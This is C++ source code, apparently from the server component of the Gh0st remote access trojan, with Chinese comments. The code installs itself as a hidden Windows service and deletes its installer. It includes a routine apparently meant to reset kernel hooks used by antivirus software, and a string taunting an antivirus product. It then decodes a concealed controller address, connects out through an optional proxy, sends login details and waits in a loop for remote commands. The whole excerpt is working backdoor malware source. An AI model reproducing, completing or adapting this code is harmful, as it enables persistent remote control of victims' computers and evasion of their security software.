int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
//////////////////////////////////////////////////////////////////////////
OutputDebugString("%%%%%F**k KV %%%%%F**k KV %%%%%");
CopyFile("%%%%%F**k KV %%%%%F**k KV %%%%%", NULL, false);
//////////////////////////////////////////////////////////////////////////
char *lpEncodeString = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";
// 如果不是更新服务端
if (strstr(GetCommandLine(), "Gh0st Update") == NULL)
{
HANDLE hMutex = CreateMutex(NULL, true, lpEncodeString);
DWORD dwLastError = GetLastError();
// 普通权限访问系统权限创建的Mutex,如果存在,如果存在就返回拒绝访问的错误
// 已经安装过一个一模一样配置的,就不安装了
if (dwLastError == ERROR_ALREADY_EXISTS || dwLastError == ERROR_ACCESS_DENIED)
return -1;
ReleaseMutex(hMutex);
CloseHandle(hMutex);
}
SetUnhandledExceptionFilter(bad_exception);
ResetSSDT(hInstance);
char strSelf[MAX_PATH];
memset(strSelf, 0, sizeof(strSelf));
GetModuleFileName(NULL, strSelf, sizeof(strSelf));
char strTempPath[MAX_PATH], strSysLog[MAX_PATH];
GetTempPath(sizeof(strTempPath), strTempPath);
GetSystemDirectory(strSysLog, sizeof(strSysLog));
lstrcat(strTempPath, "\\install.tmp");
lstrcat(strSysLog, "\\install.tmp");
HANDLE hFile = CreateFile(strTempPath, GENERIC_ALL, FILE_SHARE_WRITE, NULL,
CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
DWORD dwBytesWrite = 0;
WriteFile(hFile, strSelf, lstrlen(strSelf), &dwBytesWrite, NULL);
CloseHandle(hFile);
MoveFile(strTempPath, strSysLog);
DeleteFile(strTempPath);
char *lpServiceName = InstallService();
if (lpServiceName != NULL)
{
StartService(lpServiceName);
delete [] lpServiceName;
}
return -1;
}
DWORD WINAPI main(char *lpServiceName)
#endif
{
#ifdef _CONSOLE
if (argc < 3)
{
printf("Usage:\n %s <Host> <Port>\n", argv[0]);
return -1;
}
#endif
// lpServiceName,在ServiceMain返回后就没有了
char strServiceName[256];
char strKillEvent[50];
HANDLE hInstallMutex = NULL;
#ifdef _DLL
char *lpURL = (char *)FindConfigString(CKeyboardManager::g_hInstance, "AAAAAA");
if (lpURL == NULL)
{
return -1;
}
//////////////////////////////////////////////////////////////////////////
// Set Window Station
HWINSTA hOldStation = GetProcessWindowStation();
HWINSTA hWinSta = OpenWindowStation("winsta0", FALSE, MAXIMUM_ALLOWED);
if (hWinSta != NULL)
SetProcessWindowStation(hWinSta);
//
//////////////////////////////////////////////////////////////////////////
if (CKeyboardManager::g_hInstance != NULL)
{
SetUnhandledExceptionFilter(bad_exception);
ResetSSDT();
lstrcpy(strServiceName, lpServiceName);
wsprintf(strKillEvent, "Global\\Gh0st %d", GetTickCount()); // 随机事件名
hInstallMutex = CreateMutex(NULL, true, lpURL);
ReConfigService(strServiceName);
// 删除安装文件
DeleteInstallFile(lpServiceName);
}
// http://hi.baidu.com/zxhouse/blog/item/dc651c90fc7a398fa977a484.html
#endif
// 告诉操作系统:如果没有找到CD/floppy disc,不要弹窗口吓人
SetErrorMode( SEM_FAILCRITICALERRORS);
char *lpszHost = NULL;
DWORD dwPort = 80;
char *lpszProxyHost = NULL;
DWORD dwProxyPort = 0;
char *lpszProxyUser = NULL;
char *lpszProxyPass = NULL;
HANDLE hEvent = NULL;
CClientSocket socketClient;
BYTE bBreakError = NOT_CONNECT; // 断开连接的原因,初始化为还没有连接
while (1)
{
// 如果不是心跳超时,不用再sleep两分钟
if (bBreakError != NOT_CONNECT && bBreakError != HEARTBEATTIMEOUT_ERROR)
{
// 2分钟断线重连, 为了尽快响应killevent
for (int i = 0; i < 2000; i++)
{
hEvent = OpenEvent(EVENT_ALL_ACCESS, false, strKillEvent);
if (hEvent != NULL)
{
socketClient.Disconnect();
CloseHandle(hEvent);
break;
break;
}
// 改一下
Sleep(60);
}
}
#ifdef _DLL
// 上线间隔为2分, 前6个'A'是标志
if (!getLoginInfo(MyDecode(lpURL + 6), &lpszHost, &dwPort, &lpszProxyHost,
&dwProxyPort, &lpszProxyUser, &lpszProxyPass))
{
bBreakError = GETLOGINFO_ERROR;
continue;
}
#else
lpszHost = argv[1];
dwPort = atoi(argv[2]);
#endif
if (lpszProxyHost != NULL)
socketClient.setGlobalProxyOption(PROXY_SOCKS_VER5, lpszProxyHost, dwProxyPort, lpszProxyUser, lpszProxyPass);
else
socketClient.setGlobalProxyOption();
DWORD dwTickCount = GetTickCount();
if (!socketClient.Connect(lpszHost, dwPort))
{
bBreakError = CONNECT_ERROR;
continue;
}
// 登录
DWORD dwExitCode = SOCKET_ERROR;
sendLoginInfo(strServiceName, &socketClient, GetTickCount() - dwTickCount);
CKernelManager manager(&socketClient, strServiceName, g_dwServiceType, strKillEvent, lpszHost, dwPort);
socketClient.setManagerCallBack(&manager);
//////////////////////////////////////////////////////////////////////////
// 等待控制端发送激活命令,超时为10秒,重新连接,以防连接错误
for (int i = 0; (i < 10 && !manager.IsActived()); i++)
{
Sleep(1000);
}
// 10秒后还没有收到控制端发来的激活命令,说明对方不是控制端,重新连接
if (!manager.IsActived())
continue;
//////////////////////////////////////////////////////////////////////////
DWORD dwIOCPEvent;
dwTickCount = GetTickCount();
do
{
hEvent = OpenEvent(EVENT_ALL_ACCESS, false, strKillEvent);
dwIOCPEvent = WaitForSingleObject(socketClient.m_hEvent, 100);
Sleep(500);
} while(hEvent == NULL && dwIOCPEvent != WAIT_OBJECT_0);
if (hEvent != NULL)
{
socketClient.Disconnect();
CloseHandle(hEvent);
break;
}
}
#ifdef _DLL
//////////////////////////////////////////////////////////////////////////
// Restor WindowStation and Desktop
// 不需要恢复卓面,因为如果是更新服务端的话,新服务端先运行,此进程恢复掉了卓面,会产生黑屏
// SetProcessWindowStation(hOldStation);
// CloseWindowStation(hWinSta);
//
//////////////////////////////////////////////////////////////////////////
#endif
SetErrorMode(0);
ReleaseMutex(hInstallMutex);
CloseHandle(hInstallMutex);
}
